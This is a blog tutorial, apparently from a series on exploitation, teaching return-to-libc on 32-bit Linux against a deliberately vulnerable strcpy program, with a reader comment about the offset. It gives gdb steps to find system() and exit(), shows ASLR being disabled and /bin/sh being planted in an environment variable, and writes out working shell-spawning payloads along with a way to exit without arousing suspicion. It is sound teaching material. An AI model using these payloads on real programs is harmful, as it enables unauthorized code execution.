Return-to-libc

(This is part of my series on program vulnerability exploitation.)

So far, our method of code execution has been to write a shellcode on the stack, and execute it from there. Since there is normally no reason why a program should need to execute anything on the stack, an obvious countermeasure was to make the stack non-executable. Indeed, if you omit the -z execstack compilation flag on the programs of the previous two posts, the attacks will fail with a segmentation fault. So executing code on the stack is no longer possible.

A new method, now referred to as return-to-libc (or ret2libc for short), was introduced by Solar Designer in 1997. As its name implies, instead of overwriting the return address of our vulnerable function with an address on the stack, we will overwrite it with the address of a libc function. The libc library contains all the standard functions such as printf() and exit(), so there is almost surely a function in it that does what we need.

Theory

Some reminders about the stack. Just after a function has returned, the stack looks like this:

|                | 
+================+
|                |   old frame of the function
|                |   (no longer part of the stack)
|                |
+================+   the old return address is also no longer
| return address |   part of the stack
+----------------+
|                | <- esp (top of the stack)
|                |
|                |   frame of the caller
+----------------+
| old ebp        | <- ebp
+================+
|                |

and on the other hand, just after a function has been called, the stack looks like this:

|                | 
+================+
| return address | <- esp (top of the stack)
+----------------+
| argument 1     |
+----------------+
| argument 2     |
+----------------+     frame of the caller
| ...            |
+----------------+
| argument n     |
+----------------+
| other data     |
|                |
|                | <- ebp
+================+
|                |

If we jump to a function, for example by putting its address as the return address of a vulnerable function, it will not know that it has not been called in the standard way, and will expect the stack to be in the usual form as above. This means that if we modify the return address of a function (say, foo()) with the address of another function (say, bar()), then just after foo() has returned, the two “views” of the stack above will coincide. Thus, we know how to pass parameters to bar(), and even how to set its return address to make it jump to a certain address after it has finished: after the return address of foo() (which is the address of bar()), we write the return address of bar(), and then its arguments.

Practice

We will again be exploiting this program :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *s)
{
    char buffer[64];
    strcpy(buffer, s);
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        fprintf(stderr, "Enter a string!\n");
        exit(EXIT_FAILURE);
    }
    vuln(argv[1]);
}

but this time we will not use -z execstack. As before, we need to write 76 bytes to buffer before reaching the return address. We will also disable ASLR, since it makes our lives much harder.

First, we need to obtain the address where the code of system() is located. This address will vary among systems, but (if ASLR is disabled) it will be constant on a given system until libc is recompiled. We can obtain it for example using a bogus program and gdb:

$ cat system.c                  
#include <stdlib.h>

int main(void)
{
    system("/bin/sh");
    return 0;
}
$ gcc -m32 -g -o system system.c 
$ gdb ./system 
Reading symbols from /home/.../system...done.
(gdb) start
Temporary breakpoint 1 at 0x80483ed: file system.c, line 5.
Starting program: /home/.../system 

Temporary breakpoint 1, main () at system.c:5
5           system("/bin/sh");
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e5a430 <system>

So the address of system() is 0xf7e5a430, this is what we will write as our return address.

Then, system() takes as argument a string, which is the command we want to run, in our case it is /bin/sh. This is a bigger problem: how do we manage to obtain the address of a string /bin/sh? The easiest way, when ASLR is disabled, is as an environment variable. As we can see, environment variables are stored at the bottom of the stack (higher adresses), and they are also affected by ASLR:

$ cat useraddr.c 
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c                      
$ echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
1
$ ./useraddr 
USER is at 0xffbb3f64
$ ./useraddr
USER is at 0xffcb2f64
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
$ ./useraddr                                           
USER is at 0xffffdf64
$ ./useraddr
USER is at 0xffffdf64

We see also that the address of a given environment variable does not change if the program is recompiled:

$ gcc -m32 -o useraddr useraddr.c              
$ ./useraddr                     
USER is at 0xffffdf64

and that it also does not depend on the length of the program:

$ cat useraddr.c
#include <stdio.h>
#include <stdlib.h>

int plusone(int a)
{
    return a+1;
}

int add(int a, int b)
{
    int i;
    int res = a;
    for (i = 0; i<b; i++) {
        res = plusone(res);
    }
    return res;
}

int mult(int a, int b)
{
    int i;
    int res = 0;
    for (i = 0; i<b; i++) {
        res = add(res, a);
    }
    return res;
}

int main(int argc, char **argv)
{
    printf("3x2 = %d\n", mult(3, 2));
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c
$ ./useraddr
3x2 = 6
USER is at 0xffffdf64

It does however depend on the length of the name of the program:

$ cp useraddr useraddrrrrrrrrrrrrrrrrrrrrr
$ ./useraddrrrrrrrrrrrrrrrrrrrrr 
3x2 = 6
USER is at 0xffffdf3c
$ cp useraddr 12345678
$ ./12345678
3x2 = 6
USER is at 0xffffdf64

Where does that leave us? We know that, as long as the name of two programs have the same length, a given environment variable will be at the same address in both programs. So, we first define a bogus environment variable to contain our string /bin/sh:

$ export BINSH="/bin/sh"

Next, our vulnerable program will be named vuln8, so we create a bogus program with a five-character name which prints the address of the environment variable BINSH:

$ cat binsh.c 
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *p = getenv("BINSH");
    printf("BINSH is at %p\n", p);
    return 0;
}
$ gcc -m32 -o binsh binsh.c 
$ ./binsh
BINSH is at 0xffffdfe8

We now have everything we need: the address of system() is 0xf7e5a430 and the address of its first argument is 0xffffdfe8. So we do

$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "1"x4 . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
zsh: segmentation fault  ./vuln8 
$

We get a segmentation fault when we exit our shell (why?), but it works. The next paragraph will explain why we get a segfault and how to suppress it, so don’t read it now if you want to think about it.

Exiting cleanly

Again, we name the caller (vulnerable) function foo(), and the called function (whose address we wrote over the return address of foo()), bar(). As we saw, the word immediately ater the return address of foo() is the return address of bar(). In our case, it will thus be the address where execution will jump when system() terminates (when we exit our shell). Since we put some bogus data in it, the processor will jump to an invalid address, causing a segfault.

It might be desirable to avoid a segfault, perhaps so as to not arouse suspicion from a user, and to do that we need to write a valid address instead. What could we write? If all we wanted is spawn a shell, we have achieved that, so we have nothing more to do, and it seems appropriate to call exit(), to exit the program. We obtain the address of exit() in the same way we obtained the address of system():

$ cat exit.c 
#include <stdlib.h>

int main(void)
{
    exit(0);
}
$ gcc -m32 -o exit exit.c 
$ gdb ./exit 
Reading symbols from /home/.../exit...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x80483d7
Starting program: /home/.../exit 

Temporary breakpoint 1, 0x080483d7 in main ()
(gdb) print exit
$1 = {<text variable, no debug info>} 0xf7e4dfb0 <exit>
(gdb) 

so the address of exit() is 0xf7e4dfb0. We don’t really need to care about its arguments since it will exit the program no matter which argument we pass, and we obtain

$./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "\xb0\xdf\xe4\xf7" . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
$

2 thoughts on “Return-to-libc

  1. Narayanan

    Very nice blog and explanation. I have a question as to how you came up with “76” 1s though your buffer is only 64 bytes. What are the other 8 bytes in between the buffer and ebp of the caller (main) method ?

    ./vuln8 $(perl -e ‘print “1”x76 . “\x30\xa4\xe5\xf7” . “1”x4 . “\xe8\xdf\xff\xff”‘)

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *